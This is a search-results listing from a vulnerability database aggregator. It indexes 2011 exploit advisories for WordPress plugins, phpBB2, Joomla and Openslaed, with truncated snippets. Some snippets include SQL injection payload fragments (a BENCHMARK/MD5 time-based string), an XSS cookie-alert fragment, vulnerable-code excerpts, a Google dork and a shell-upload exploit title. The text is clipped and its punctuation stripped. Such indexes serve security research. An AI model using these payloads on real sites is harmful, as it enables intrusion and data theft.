
1370 matches found

Packet Storm
added 2011/08/31 12:0 a.m., 23 views

WordPress WP Audio Gallery Playlist 0.12 SQL Injection

Exploit Title: WordPress wp audio gallery playlist plugin prefix . "posts"; ... if isset$GET'postgallery' $query = 'SELECT FROM '.$tablename.' WHERE postparent = ''.$GET'postgallery'.'' AND postmimetype = 'audio/mpeg' ORDER BY menuorder ASC';...

0.4 AI score
Exploits: 0
Packet Storm
added 2011/08/31 12:0 a.m., 24 views

WordPress Yolink Search 1.1.4 SQL Injection

Exploit Title: WordPress yolink Search plugin getresults $wpdb-prepare "SELECT ID,GUID FROM $wpdb-posts WHERE poststatus='publish' AND posttype IN $posttypein AND ID $idfrom order by ID asc LIMIT $batchsize" ; //misusage of $wpdb-prepare :...

0.2 AI score
Exploits: 0
Exploit DB
added 2011/08/30 12:0 a.m., 40 views

vAuthenticate 3.0.1 - Authentication Bypass

vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability Author: bd0rk Contact: bd0rkathackermail.com Date: 2011 / 08 / 30 MEZ-Time: 01:35...

7.4 AI score
Exploits: 0
Exploit DB
added 2011/08/30 12:0 a.m., 25 views

WordPress Plugin Couponer 1.2 - SQL Injection

Exploit Title: WordPress Couponer plugin = 1.2 SQL Injection Vulnerability Date: 2011-08-31 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/couponer.zip Version: 1.2 tested Note: magicquotes has to be turned off --- PoC ---...

7.4 AI score
Exploits: 0
Exploit DB
added 2011/08/30 12:0 a.m., 22 views

WordPress Plugin Advertizer 1.0 - SQL Injection

Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id = '".$POSTid."' limit 1;";...

7.4 AI score
Exploits: 0
exploitpack
added 2011/08/30 12:0 a.m., 16 views

WordPress Plugin Advertizer 1.0 - SQL Injection

Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id =...

0.2 AI score
Exploits: 0
seebug.org
added 2011/08/29 12:0 a.m., 15 views

WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Evarisk plugin = 5.1.3.6 SQL Injection Vulnerability Date: 2011-08-28 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip Version: 5.1.3.6 tested Note:...

7.1 AI score
Exploits: 0
seebug.org
added 2011/08/28 12:0 a.m., 24 views

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

No description provided by source. ^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability ^ Author : Silic0n sciencemedia017Atyahoo.com ^ MOD Title: Custom mass PM ^ MOD Description: Add mass PM functionnality to group members or all forums members for authorized users...

7.1 AI score
Exploits: 0
Packet Storm
added 2011/08/27 12:0 a.m., 24 views

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

alertdocument.cookie -------------------- ^ Vulnerable code -------------------- $tousernamearray = explode...

0.2 AI score
Exploits: 0
exploitpack
added 2011/08/18 12:0 a.m., 9 views

WordPress Plugin DS FAQ 1.3.2 - SQL Injection

Exploit Title: WordPress WP DS FAQ plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- switch$POST'action' ... case 'deletefaqbook': if!isset$POST'id' error; $id = $POST'id'; ... $sql = "DELETE FRO...

0.6 AI score
Exploits: 0
seebug.org
added 2011/08/18 12:0 a.m., 12 views

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress Easy Contact Form Lite plugin = 1.0.7 SQL Injection Vulnerability Date: 2011-08-17 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip Version:...

7.1 AI score
Exploits: 0
Packet Storm
added 2011/08/18 12:0 a.m., 14 views

WordPress Contus HD FLV Player 1.3 SQL Injection

Exploit Title: WordPress Contus HD FLV Player plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0&listItem=1 --------------- Vulnerable code --------------- $pid1 = $GET'playid'; foreach $GET'listItem' as $position = $item : mysqlquery"UPDATE $wpdb-prefix" . "hdflvmed2play SET sorder =...

0.4 AI score
Exploits: 0
Exploit DB
added 2011/08/18 12:0 a.m., 27 views

WordPress Plugin Ajax Gallery 3.0 - SQL Injection

Exploit Title: WordPress Ajax Gallery plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if isset $GET 'delete' && isset $GET'gId' $wpdb-query "DELETE FROM $wpdb-options WHERE optionname='agItem' and optionid=".$GET'gId' ; echo "Galeria...

7 AI score
Exploits: 0
Exploit DB
added 2011/08/18 12:0 a.m., 20 views

WordPress Plugin Global Content Blocks 1.2 - SQL Injection

Exploit Title: WordPress Global Content Blocks plugin 0 // intval"1a" = 1 : $entry = $wpdb-getrow"select from ".$wpdb-prefix."gcb where id=".$id; $finaltext = base64encode$entry-name."". base64encode$entry-description."". base64encode$entry-value."". base64encode$entry-type;...

7.4 AI score
Exploits: 0
exploitpack
added 2011/08/16 12:0 a.m., 14 views

WordPress Plugin IP-Logger 3.0 - SQL Injection

Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested ---...

0.3 AI score
Exploits: 0
Exploit DB
added 2011/08/16 12:0 a.m., 41 views

WordPress Plugin IP-Logger 3.0 - SQL Injection

Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested --- PoC ---...

7.4 AI score
Exploits: 0
Exploit DB
added 2011/08/05 12:0 a.m., 28 views

WordPress Plugin Social Slider 5.6.5 - SQL Injection

Exploit Title: Social Slider...

7.4 AI score
Exploits: 0
0day.today
added 2011/07/21 12:0 a.m., 152 views

Joomla Component mod_spo SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Simple Page Option LFI Google Dork: inurl:modspo Date: 15/07/2011 Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/modspo1.5.16.zip Version: 1.5.x...

7.1 AI score
Exploits: 0
Packet Storm
added 2011/07/21 12:0 a.m., 33 views

Joomla Simple Page Option Local File Inclusion

Simple Page Option – LFI Vulnerable-Code: $slang =& JRequest::getVar'spositelang'; fileexistsdirnameFILE.DS.'languages'.DS.$slang.'.php' ? includedirnameFILE.DS.'languages'.DS.$slang.'.php' : includedirnameFILE.DS.'languages'.DS.'english.php'; Vulnerable-Var: spositelang= Expl0iting:...

0.4 AI score
Exploits: 0
Packet Storm
added 2011/07/14 12:0 a.m., 26 views

Openslaed 1.2 Remote Shell Upload

?php / Vendor: www.slaed.net Download : http://www.slaed.net/uploads/files/public/openslaed.zip exploited by ..: eidelweiss Affected: Version 1.2 Other or lowers version may also be affected Greetz: yogyacarderlink Team, devilzc0de Team, Nofia Fitri unyu², whitehat, petimati, psycothicgirl, viska...

7.4 AI score
Exploits: 0